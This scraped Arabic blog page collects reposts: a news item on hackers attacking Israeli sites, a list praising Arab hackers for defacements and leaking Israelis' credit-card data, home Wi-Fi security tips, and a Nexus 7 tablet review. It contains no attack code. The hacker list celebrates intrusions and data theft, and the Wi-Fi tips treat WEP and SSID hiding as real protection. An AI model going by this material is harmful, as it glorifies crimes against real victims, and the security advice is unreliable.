وأضافت الوكالة أن المجموعة استطاعت الوصول إلى أكثر المواقع حساسية في الكيان الصهيوني مثل موقع مركز تدريب قوات الأمن الإسرائيلي وموقع منتدى إسرائيل الأساسي وموقع تجاري مصرفي يقوم بحماية البطاقات المصرفية للإسرائيليين.

وتقول الوكالة أن الهدف الثاني للمجموعة من هذا الهجوم هو الاحتجاج على الرأي العالمي الرافض لامتلك إيران إلى الطاقة النووية وحتى لو لأغراض سلمية.

وكان قد ضرب فيروس مؤخراً حواسيب منشأة المفاعل النووي الإيراني مما جعل الحواسيب تعمل ليلاً وقام بتشغيل موسيقى صاخبة في المنشأة.




www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : , ,

صورة ولكم التعليق

صورة ولكم التعليق






www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : ,

|تقرير عن اشهر الهاكرز على مستوى الوطن العربى |



‏Photo: اخبار الكمبيوتر |تقرير عن اشهر الهاكرز على مستوى الوطن العربى | 1) Cyber-Terrorist ( السعودى ) : من أشهر وأقوى الهاكرز العرب، وقد لقب بقاهر اليهود لاختراقه العديد من المواقع العالمية المتخصصة بالأمن والحماية وأنظمة الكمبيوتر مثل مايكروسوفت وكاسبر، كما نجح في اختراق مواقع العديد من البنوك والشركات الكبرى بالإضافة إلى موقع الرسام الدنمركي الذي أساء للرسول صلى الله عليه وسلم، وقد توفي نتيجة أزمة ربو حادة في أبريل 2012... 2) 0xOmar ( السعودى ) : حقق الهاكر السعودي عمر، والذي يعرف على الإنترنت باسم 0xOmar، شهرة عالمية بعدما تمكن من كشف بيانات بطاقات الائتمان الخاصة بآلاف الإسرائيليين ما تسبب في هلع داخل الكيان الصهيوني خاصة بعدما اعترفت البنوك الإسرائيلية بحدوث الاختراق لبيانات 400 ألف عميل، وقد فشلت محاولات الكشف عن هويته ما دفع داني إيالون ـ نائب وزير خارجية إسرائيل ـ إلى اعتبار الأمر إرهاب تكنولوجي متوعداً بالرد، فقام 0xOmar بتعطيل موقع داني إيالون في هجوم استغرق نصف ساعة فقط. 3) Dr.Silnt Hill ( المصرى ) : يعد الهاكر دكتور سيلنت هل من اقوى الهاكرز فى مصر وهو ينتمى لفريق Team Hacker EgYpt حيث قام فى عام 2009 بأختراق اكثر من 100 موقع بيع وشراء اسرائيلى وهذا أثــَّـر اقتصاديا على اسرائيل وقام بعمل حملة على المواقع الدنماركية واخترق اكثر من 200 موقع امريكي بسبب مافعلته دولة الدنمارك من سب رسول الله وايضا ً كان متخصصا فى اختراق المواقع الاباحية . 4 ) Red Virus ( المصرى ) : يعد ريد فيرس من اهم القراصنة الموجودون على الشبكة العنكبوتية لانه كان يتيمز بأختراق المواقع الحكومية للدول الكبرى وقام بأختراق موقع الكنسيت الاسرائيلى فى عام 2011 وكان يتميز بتخطيه لأقوى الحمايات فى السيرفرات حول العالم 5 ) Kader 11000 ( الجزائرى ) : يطارد الهاكر الجزائري Kader 11000 من قبل العدالة في الولايات المتحدة وفرنسا وإسرائيل وذلك نتيجة اختراقه العديد من المواقع في تلك الدول، ووفقاً لما ذكره Kader لصحيفة الشروق الجزائرية فقد اخترق أكثر من 50 ألف موقع منها موقع ماري لوبان زعيمة اليمين المتطرف في فرنسا والمعادي للإسلام، وحزب كاديما الإسرائيلي، وموقع بطاقات ViSA الأميركية والمواقع الجنسية العربية وغيرها، ووفقاً Kader فإنه لا يقوم بذلك بهدف التخريب وإنما بهدف أن يكون فخراً للعروبة والإسلام، مشيراً إلى أنه يعرف أن نهاية قراصنة الإنترنت هي الموت أو السجن. 6 ) Soly Hacker ( المصرى ) : كان الهكر سولى يتميز بأختراقة لمواقع السكيوريتى ومواقع الهكر حول العالم حيث قام بأختراق موقع فيس بوك هاك الموقع العالمى الذى كان يتخصص فى الاسكربيتات والبرامج الخاصة بالهاكر والتى تستخدم فى العاب الفيس بوك وايضا قام بأختراق موقع باراك اوباما الاسرائيلى وايضا قام هذا العام بأختراق موقع سعودى اون لاين وقطع التجارة الالكترونية بين دولة السعودية و استراليا 7 ) Sniper Hex ( السعودى ) : الهاكر السعودي Sniper Hex نجح في اختراق العديد من المواقع الإسرائيلية الرسمية مثل وزارة التعليم الإسرائيلية، ووزارة السياحة، ووزارة الشؤون الدينية، وموقع حزب الليكود وتدمير أكبر موقع بحث إسرائيلي Guide والعديد من المواقع الأخرى، ويقول Sniper Hex إنه تلقى العديد من العروض المالية لمساعدة أشخاص على التجسس أو اختراق حسابات شخصية لكنه رفض، مضيفاً أنه يعمل على إيجاد الثغرات الأمنية لدى المواقع العربية وتنبيه المسؤولين عنها وتدمير المواقع العربية الإباحية أو المواقع الغربية التي تهاجم الإسلام والعرب. 8 ) Mego ( المصرى ) كان يتميز الهكر ميجو بأختراق مواقع الانتى فيرس مثل اختراق افاست وكاسبر اسكاى وبعض مواقع الانتى فيرس الكبرى حول العالم وقام Mego ايضا بأختراق شركة دومين الاسرائلية وسحب جميع الداتا الخاصة بعملاء الشركة وتسريبها على شبكة الانترنت واستطاع ايضا اختراق مواقع حكومية لعدة دول مثل اسرائيل والدنمارك وايران المصدر : شبكة رصد‏
1) Cyber-Terrorist ( السعودى ) : من أشهر وأقوى الهاكرز العرب، 
وقد لقب بقاهر اليهود لاختراقه العديد من المواقع العالمية المتخصصة بالأمن والحماية وأنظمة الكمبيوتر مثل مايكروسو
فت وكاسبر، كما نجح في اختراق مواقع العديد من البنوك والشركات الكبرى بالإضافة إلى موقع الرسام الدنمركي الذي أساء للرسول صلى الله عليه وسلم، وقد توفي نتيجة أزمة ربو حادة في أبريل 2012...

2) 0xOmar ( السعودى ) : حقق الهاكر السعودي عمر، والذي يعرف على الإنترنت باسم 0xOmar، شهرة عالمية بعدما تمكن من كشف بيانات بطاقات الائتمان الخاصة بآلاف الإسرائيليين ما تسبب في هلع داخل الكيان الصهيوني خاصة بعدما اعترفت البنوك الإسرائيلية بحدوث الاختراق لبيانات 400 ألف عميل، وقد فشلت محاولات الكشف عن هويته ما دفع داني إيالون ـ نائب وزير خارجية إسرائيل ـ إلى اعتبار الأمر إرهاب تكنولوجي متوعداً بالرد، فقام 0xOmar بتعطيل موقع داني إيالون في هجوم استغرق نصف ساعة فقط.

3) Dr.Silnt Hill ( المصرى ) : يعد الهاكر دكتور سيلنت هل من اقوى الهاكرز فى مصر وهو ينتمى لفريق Team Hacker EgYpt حيث قام فى عام 2009 بأختراق اكثر من 100 موقع بيع وشراء اسرائيلى وهذا أثــَّـر اقتصاديا على اسرائيل وقام بعمل حملة على المواقع الدنماركية واخترق اكثر من 200 موقع امريكي بسبب مافعلته دولة الدنمارك من سب رسول الله وايضا ً كان متخصصا فى اختراق المواقع الاباحية .

4 ) Red Virus ( المصرى ) : يعد ريد فيرس من اهم القراصنة الموجودون على الشبكة العنكبوتية لانه كان يتيمز بأختراق المواقع الحكومية للدول الكبرى وقام بأختراق موقع الكنسيت الاسرائيلى فى عام 2011 وكان يتميز بتخطيه لأقوى الحمايات فى السيرفرات حول العالم

5 ) Kader 11000 ( الجزائرى ) : يطارد الهاكر الجزائري Kader 11000 من قبل العدالة في الولايات المتحدة وفرنسا وإسرائيل وذلك نتيجة اختراقه العديد من المواقع في تلك الدول، ووفقاً لما ذكره Kader لصحيفة الشروق الجزائرية فقد اخترق أكثر من 50 ألف موقع منها موقع ماري لوبان زعيمة اليمين المتطرف في فرنسا والمعادي للإسلام، وحزب كاديما الإسرائيلي، وموقع بطاقات ViSA الأميركية والمواقع الجنسية العربية وغيرها، ووفقاً Kader فإنه لا يقوم بذلك بهدف التخريب وإنما بهدف أن يكون فخراً للعروبة والإسلام، مشيراً إلى أنه يعرف أن نهاية قراصنة الإنترنت هي الموت أو السجن.

6 ) Soly Hacker ( المصرى ) : كان الهكر سولى يتميز بأختراقة لمواقع السكيوريتى ومواقع الهكر حول العالم حيث قام بأختراق موقع فيس بوك هاك الموقع العالمى الذى كان يتخصص فى الاسكربيتات والبرامج الخاصة بالهاكر والتى تستخدم فى العاب الفيس بوك وايضا قام بأختراق موقع باراك اوباما الاسرائيلى وايضا قام هذا العام بأختراق موقع سعودى اون لاين وقطع التجارة الالكترونية بين دولة السعودية و استراليا

7 ) Sniper Hex ( السعودى ) : الهاكر السعودي Sniper Hex نجح في اختراق العديد من المواقع الإسرائيلية الرسمية مثل وزارة التعليم الإسرائيلية، ووزارة السياحة، ووزارة الشؤون الدينية، وموقع حزب الليكود وتدمير أكبر موقع بحث إسرائيلي Guide والعديد من المواقع الأخرى، ويقول Sniper Hex إنه تلقى العديد من العروض المالية لمساعدة أشخاص على التجسس أو اختراق حسابات شخصية لكنه رفض، مضيفاً أنه يعمل على إيجاد الثغرات الأمنية لدى المواقع العربية وتنبيه المسؤولين عنها وتدمير المواقع العربية الإباحية أو المواقع الغربية التي تهاجم الإسلام والعرب.

8 ) Mego ( المصرى ) كان يتميز الهكر ميجو بأختراق مواقع الانتى فيرس مثل اختراق افاست وكاسبر اسكاى وبعض مواقع الانتى فيرس الكبرى حول العالم وقام Mego ايضا بأختراق شركة دومين الاسرائلية وسحب جميع الداتا الخاصة بعملاء الشركة وتسريبها على شبكة الانترنت واستطاع ايضا اختراق مواقع حكومية لعدة دول مثل اسرائيل والدنمارك وايران



www.afinis.co.cc : المصدر
Publié par Unknown 3 commentaires
Libellés : , ,

10 نقاط لحماية الاتصال بالـ Wi Fi


‏Photo: اخبار الكمبيوتر |10 نقاط لحماية الاتصال بالـ Wi Fi | عند التوصيل شبكة الانترنت فى منزلك يتطلب منك حمايتها من أى احد يستطيع استخدامها دون علمك ..فبهذه النقاط نعرض كيف تقوم بتنفيذ هذه الحماية.. 1- تغيير الحساب وكلمة المرور الخاص بالـ Admin معظم الروتيرز الاجهزة التى تقوم بخروج الشبكات الداخلية على الانترنت بها كلمة مرور وحساب خاص للـ Admin المفترضdefault، فمن الافضل أن تقوم بتغييرها من صفحة الادارة والضبط device’s administrative pages للحفاظ على الشبكة الخاصة بك من المخترقيين وذلك من خلال administrative panel. 2- فتح تشفير الجهاز WPA / WEP معظم أجهزة الاتصال الغير سلكية تضم كود للتشفير ، التقنة الخاصة بالاتصال المشفر فى الاجهزة الغير سلكية تعد من التقنيات الضرورية لحماية الشبكة لديك وتسمى تقنية WPA القوية لتشفير الاتصال بالشبكة للأجهزة الاتصال المنزلية وايضا تقنية WEP تستخدم لذلك الأمر. 3- تغيير SSID المفترض default نقاط الاتصال والروتيرز يستخدموا شبكة خاصة تسمى SSID ، من المتبع الشركة المصنعة لجهاز الاتصال مثل الروترز هى التى توضع هذه الشبكة .مثال لذلك شركة Netgear تكون الشبكة باسم NETGEAR وهكذا..، فيمكن تغيير اسم الشبكة المفترض من خلال administrative panel 4- تنقية العنوان الرقمى MAC Address للجهاز كل جهاز من أجهزة الاتصال اللاسلكية يوجد بها رقم مخصص يسمى MAC Addressللخروج للاتصال عبر شبكة الانترنت ، لكل جهاز روترز أو اتصال على شبكة الانترنت بيعطيك تحكم فى السماح للأجهزة التى لديك بتدخيل الـ MAC Addressالرقم الخاص بها حتى لا يستفاد بخدمات الاتصال لديك غيرهذه الاجهزة، مما يعطيك الحماية وتاكد من فاعلية تقنية MAC spoofing 5- إلغاء تفعيل SSID Broadcast ولأن كل جهاز اتصال يكون له SSID اسم للشبكة المصنعة للجهاز افتراضى ، يكون ظاهر لجميع الشبكات اللاسلكية الآخرى غير التى تستخدمها فى منزلك .فمن الأفضل ان تقوم بعدم اظهار هذا الاسم كحماية من الاختراق أو تغييره من مهام إدارة الشبكة network administrator 6- لا تقوم بفتح التلقائى على شبكة الاتصال اللاسلكيةWireless غالباً تقوم اجهزة الكمبيوتر بفتح الاتصال للاسلكى تلقائياً باستخدام الشبكة الاتصال دون تعريف بالمستخدم مما يعرض حماية الاتصال للاسلكى الخاصة للاختراق ، فيمكن اضافة من مهام إدارة الشبكة التعريف بالمستخدم من اجهزة الشبكة للاسلكية للحماية. 7- وضع رقم حاسوب ثابت للاتصال على الشبكة اللاسلكيةWireless معظم أجهزة الحاسب التى تتم بها الاتصال على شبكة الانترنت تحصل على عنوانها الرقمى IP Address تلقائى من الـDHCP بالأرقام المتاحة من خلاله ، فمن الافضل لتأمين حماية الشبكة الاتصال للاسلكية أن تقوم بوضع رقم الكمبيوتر ثابت من مهام التضبيط بوضع IP Address مثل 10.0.0.x 8- تفعيل خاصية جدار الحماية Firewalls من الأفضل لتأمين جهازك الشخصى وجهاز الاتصال مثل الروترز حيث تضم معظم الاجهزة الحديثة جدار حامى لها built-in firewall capability بتفعيل جدار الحماية Firewalls ، فتاكد من أن هذه الخاصة مفعله فى تلك الجهازين حتى لا يتم اختراق الشبكة والاجهزة التى لديك 9- مكان جهاز الاتصال الروترز بوضع مأمن معظم اجهزة الاتصالات اللاسلكية الروترز بتسمح بألتقاط الاتصال من مسافات متبعده فى الاستخدامات داخل المنزل من الافضل وضع اجهزة الاتصال الروترز فى وسط المنزل بعيد ان النوافذ حيث من الممكن ان تكون عرضة للاختراق من الجار أو اى شخص آخر قريب من النطاق الشبكة ، وتوجد فى بعض الاجهزة تحديد النطاق الاستخدام لحماية الشبكة من الاختراق يمكن تغيير النطاق من إدارة الشبكة للروترز فى administrative panel. 10- خاصية غلق شبكة اللاسلكية تلقائيا عند عدم الاستخدام فى فتره محددة وهى عند ذهابك إلى رحلة وسفر مؤقت وتريد عدم استخدام الشبكة الاتصال اللاسلكية داخل المنزل لحماية من الاختراق فيمكنك تفعيل خاصية عند عدم استخدام الشبكة فى فترة محدده يتم غلق الاتصال‏
|10 نقاط لحماية الاتصال بالـ Wi Fi |
عند التوصيل شبكة الانترنت فى منزلك يتطلب منك حمايتها من أى احد يستطيع استخدامها دون علمك ..فبهذه النقاط نعرض كيف تقوم بتنفيذ هذه الحماية..

1- تغيير الحساب وكلمة المرور الخاص بالـ Admin
معظم الروتيرز الاجهزة التى تقوم بخروج الشبكات الداخلية على الانترنت بها كلمة مرور وحساب خاص للـ Admin المفترضdefault، فمن الافضل أن تقوم بتغييرها من صفحة الادارة والضبط device’s administrative pages للحفاظ على الشبكة الخاصة بك من المخترقيين وذلك من خلال administrative panel.

2- فتح تشفير الجهاز WPA / WEP
معظم أجهزة الاتصال الغير سلكية تضم كود للتشفير ، التقنة الخاصة بالاتصال المشفر فى الاجهزة الغير سلكية تعد من التقنيات الضرورية لحماية الشبكة لديك وتسمى تقنية WPA القوية لتشفير الاتصال بالشبكة للأجهزة الاتصال المنزلية وايضا تقنية WEP تستخدم لذلك الأمر.

3- تغيير SSID المفترض default
نقاط الاتصال والروتيرز يستخدموا شبكة خاصة تسمى SSID ، من المتبع الشركة المصنعة لجهاز الاتصال مثل الروترز هى التى توضع هذه الشبكة .مثال لذلك شركة Netgear تكون الشبكة باسم NETGEAR وهكذا..، فيمكن تغيير اسم الشبكة المفترض من خلال administrative panel

4- تنقية العنوان الرقمى MAC Address للجهاز
كل جهاز من أجهزة الاتصال اللاسلكية يوجد بها رقم مخصص يسمى MAC Addressللخروج للاتصال عبر شبكة الانترنت ، لكل جهاز روترز أو اتصال على شبكة الانترنت بيعطيك تحكم فى السماح للأجهزة التى لديك بتدخيل الـ MAC Addressالرقم الخاص بها حتى لا يستفاد بخدمات الاتصال لديك غيرهذه الاجهزة، مما يعطيك الحماية وتاكد من فاعلية تقنية MAC spoofing

5- إلغاء تفعيل SSID Broadcast
ولأن كل جهاز اتصال يكون له SSID اسم للشبكة المصنعة للجهاز افتراضى ، يكون ظاهر لجميع الشبكات اللاسلكية الآخرى غير التى تستخدمها فى منزلك .فمن الأفضل ان تقوم بعدم اظهار هذا الاسم كحماية من الاختراق أو تغييره من مهام إدارة الشبكة network administrator

6- لا تقوم بفتح التلقائى على شبكة الاتصال اللاسلكيةWireless
غالباً تقوم اجهزة الكمبيوتر بفتح الاتصال للاسلكى تلقائياً باستخدام الشبكة الاتصال دون تعريف بالمستخدم مما يعرض حماية الاتصال للاسلكى الخاصة للاختراق ، فيمكن اضافة من مهام إدارة الشبكة التعريف بالمستخدم من اجهزة الشبكة للاسلكية للحماية.

7- وضع رقم حاسوب ثابت للاتصال على الشبكة اللاسلكيةWireless
معظم أجهزة الحاسب التى تتم بها الاتصال على شبكة الانترنت تحصل على عنوانها الرقمى IP Address تلقائى من الـDHCP بالأرقام المتاحة من خلاله ، فمن الافضل لتأمين حماية الشبكة الاتصال للاسلكية أن تقوم بوضع رقم الكمبيوتر ثابت من مهام التضبيط بوضع IP Address مثل 10.0.0.x

8- تفعيل خاصية جدار الحماية Firewalls
من الأفضل لتأمين جهازك الشخصى وجهاز الاتصال مثل الروترز حيث تضم معظم الاجهزة الحديثة جدار حامى لها built-in firewall capability بتفعيل جدار الحماية Firewalls ، فتاكد من أن هذه الخاصة مفعله فى تلك الجهازين حتى لا يتم اختراق الشبكة والاجهزة التى لديك

9- مكان جهاز الاتصال الروترز بوضع مأمن
معظم اجهزة الاتصالات اللاسلكية الروترز بتسمح بألتقاط الاتصال من مسافات متبعده فى الاستخدامات داخل المنزل من الافضل وضع اجهزة الاتصال الروترز فى وسط المنزل بعيد ان النوافذ حيث من الممكن ان تكون عرضة للاختراق من الجار أو اى شخص آخر قريب من النطاق الشبكة ، وتوجد فى بعض الاجهزة تحديد النطاق الاستخدام لحماية الشبكة من الاختراق يمكن تغيير النطاق من إدارة الشبكة للروترز فى administrative panel.

10- خاصية غلق شبكة اللاسلكية تلقائيا عند عدم الاستخدام فى فتره محددة
وهى عند ذهابك إلى رحلة وسفر مؤقت وتريد عدم استخدام الشبكة الاتصال اللاسلكية داخل المنزل لحماية من الاختراق فيمكنك تفعيل خاصية عند عدم استخدام الشبكة فى فترة محدده يتم غلق الاتصال

www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés : ,

«غوغل»: جهاز لوحي جديد يتحدى «آي باد»

قد تعجب بشركة «أبل» وقد تمقتها، لكن المؤكد هو أن لعبتها المفضلة هي زعامة الصناعة، بينما لعبة قطاع تقنية المعلومات بالمقابل هي اتباع الزعيم! وكان ستيف جوبز يكره التقليد. «فبرنامج (أندرويد) حطم آي فون، ومبيعاته الإجمالية حطمتنا نحن، وسأقوم بتدمير (أندرويد) لأنه منتج مسروق»، كما ذكر جوبز لكاتب سيرة حياته والتر إيزاكسون.
لكن ثمة جانب إيجابي لهذا التقليد، إذ يمكن القول إن المنتجات المقلدة لـ«أبل» ملأت الأسواق، حيث لم تتجرأ الأخيرة على الحضور هناك، أو حتى طرح بديل حقيقي لـ«أبل» يمكن التحكم به في عالم مقيد بالخيارات.
* تصاميم من «غوغل»
* في ضوء كل هذا جاء الإعلان عن منتج «غوغل» الجديد للعام الحالي كواحد من الأنباء السارة. فقد قامت «غوغل» بفتح مخزن موحد على الشبكة ببطاقات تبويب منفصلة، وكتب إلكترونية، وبرامج تلفزيونية، وأفلام سينمائية، وموسيقى، بنموذج ينسجم مع مخزن «آي تيونز».
وقد طرحت «غوغل» أخيرا «نيكسوس كيو» Nexus Q الذي هو عبارة عن كرة سوداء تتصل بجهاز التلفزيون لتشغل الأغاني والموسيقى والفيديو تماما على غرار تلفزيون «أبل» بشكله المربع الأسود. وكانت «غوغل» قد أنزلت أخير أيضا «نيكسوس 7» Nexus 7، الذي هو جهاز لوحي أسود لامع، يرمي إلى تحدي كل من «آي باد» و«كيندل فاير» من «أمازون». وما تفكر فيه «غوغل» هو أنها راغبة في مضاهاة «أبل» في تخفيض الفوضى، وليس تشجيعها وتعزيزها.
والمزية المهمة في «كيندل فاير» هي سعره البالغ 200 دولار. وهذا السعر يبدو مناسبا في عالم، يصل فيه سعر «آي باد» الجهاز اللوحي المسيطر على السوق إلى 500 دولار، وما فوق. طبعا «كيندل فاير» ليس كـ«آي باد». فشاشته البالغة سبع بوصات هي أصغر كثيرا، وهو أسمك وأكبر حجما، ولا يملك كاميرا، أو ميكروفون، أو «جي بي إس»، أو «بلوتوث»، أو شقا لوضع بطاقة الذاكرة. ومهمته الأساسية هي تشغيل المواد والمحتويات المشتراة من «أمازون»، كالكتب والفيديو.
* جهاز لوحي
* وهذا ما يجعل وصول جهاز «غوغل» اللوحي الذي تنتجه «أسوس» حدثا مهما. وهو مزود أيضا بشاشة قياس سبع بوصات ويكلف 200 دولار. لكن هذه المرة لا تشعر أن منتجيه قتروا عليه، لتخفيض سعره. فهو نحيف ورشيق وجميل، بأطراف مستديرة، خلافا للعلبة المربعة السوداء «فاير». وهو يزن 2.6 أونصة (الأونصة نحو 28 غراما)، أقل من «فاير». وهذا ما يجعل الفرق كبيرا، وهو أرق قليلا أيضا رغم إنه أسمك من «آي باد».
والأهم من ذلك أن «نيكسوس» هو جهاز لوحي بالكامل، ويقوم بكافة وظائفه المتوقعة منه. كما أنه سريع وسلس الاستخدام، وقادر على تشغيل أي تطبيق خاص بجهاز «أندرويد» اللوحي. وهو بذلك قوض مكانة «كيندل فاير»، والأجهزة اللوحية الأخرى المنافسة لـ«أندرويد» من أمثال «غالاكسي تاب 2» الذي يكلف 250 دولارا، مقابل الثماني غيغابايتات ذاتها من الذاكرة.
لكن كيف استطاعت «غوغل» تقديم جهاز لوحي فخم بسعر جهاز «أمازون» المجرد من أمور كثيرة؟ لقد قمت بسؤال الفريق المسؤول عن جهاز «نيكسوس»، وما إذا كانوا يخسرون في كل جهاز لوحي ينتجونه، مقابل جني أرباح عن طريق بيع الكتب، والموسيقى، والبرامج التلفزيونية. وأقرت «غوغل» أنها لا تجني أرباحا عندما تبيع هذا الجهاز اللوحي من موقعها على الشبكة، وبذلك فإنها من المؤكد أنها تخسر مالا عن كل جهاز تبيعه في المخزن.
* مزايا «نيكسوس 7»
* في أي حال فإن «نيكسوس 7» مجهز بشكل جيد بالنسبة إلى جهاز بسعر 200 دولار. فهو مزود بـ«واي - فاي»، و«بلوتوث»، وبطارية تدوم شحنتها تسع ساعات، وشاشة براقة وواضحة جدا، وبمكبر صوت إفرادي قوي، و«جي بي إس»، والمزية الأخيرة رائعة فعلا.
ولا ينقص العتاد سوى القليل جدا، وهنالك كاميرا في الأمام لمكالمات الفيديو، ولكن لا يوجد كاميرا في الخلف. والبطارية لا يمكن نزعها، كما لا يوجد خيار للاتصالات الهاتفية الخليوية، بل يمكن التواصل مع الإنترنت فقط عبر «واي - فاي». ولكون لا يوجد شق لبطاقة الذاكرة، فإن سعة التخزين البالغة ثماني غيغابايت هي كل ما هو متوفر. ويمكن الحصول على طراز الـ16 غيغابايت، مقابل 50 دولارا زيادة على السعر الأصلي.
ويتفرد «نيكسوس 7» عن سائر الأجهزة اللوحية باحتوائه على النسخة الأخيرة من «أندرويد 4.1» المسماة «جيلي بيين». والأخيرة تقدم عشرات المميزات الجديدة، منها مثلا إبراز «غوغل ناو» عن طريق مسح الشاشة بالأصبع إلى الأعلى، فضلا عن «البطاقات» الصغيرة التي تحمل معلومات يعتقد أنك بحاجة إليها الآن، والتي تعتمد على موقعك وتاريخه، والتقويم اليومي، وبحث «غوغل».
وإذا كنت قد بحثت أخيرا عن فريق رياضي معين، أو رحلة جوية على سبيل المثال، يمكنك أيضا الاطلاع على وضع الرحلات الجوية ومواعيدها. كما أن حالة الطقس، وحركة المرور، والمواعيد الأخرى، هي جزء أيضا من هذه الميزات.
ويمكن الآن حفظ خرائط «غوغل مابس» عن مدينة برمتها على الجهاز هذا، بحيث لا تحتاج إلى التواصل مع الإنترنت بغية الملاحة عبرها. وهذا مناسب جدا لدى السفر إلى الخارج.
أما مزية الطباعة عن طريق النطق فهي تعمل حتى من دون التواصل مع الإنترنت، وهي تعمل طبعا بشكل أفضل إذا كنت على الشبكة، لكنك تحصل على الأقل على بعض الدقة الأساسية من دونها.
* سلاسة التشغيل
* غير أن التغيير المهم الذي حدث هو سلاسة التشغيل، فقد أبلى مهندسو «غوغل» بلاء حسنا في جعل «أندرويد 4.1» مستجيبا تماما لعمليات اللمس، كما أن عمليات المحاكاة تعمل بسلاسة فائقة بسرعة 60 إطارا في الثانية، إذ تقول «غوغل» إنها تحاول توقع خطوة أصبعك التالية، وأين سيكون، لتعيد ترتيب الشاشة وفقا لذلك. لكن للأسف فإن استخدام «جيلي بيين» لا يمكن جهازك من استخدام فيديو «فلاش» على الشبكة، الذي كان مزية مهمة لـ«أندرويد»، مقارنة بـ«آي باد». كذلك فإن «جيلي بيين» أزالت القدرة على تحويل شاشة المنزل من قياس 90 بوصة إلى عرض المشاهد بشكل عريض (لاندسكايب)، التي مصدرها شاشة الجهاز اللوحي قياس سبع بوصات، إذ تبقى المشاهد قائمة فقط.
والأمر السلبي بالنسبة إلى «غوغل» أن مخزنها يضم القليل من التطبيقات الخاصة بالأجهزة اللوحية، بينما هنالك مئات الآلاف منها بتصرف جهاز «آي باد».
* خدمة «نيويورك تايمز»


www.afinis.co.cc : المصدر
Publié par Unknown 0 commentaires
Libellés :
 
Copyleft © 2011. مدونة الهكر الاخلاقي العربي - All lefts Reserved
تعريب the3kira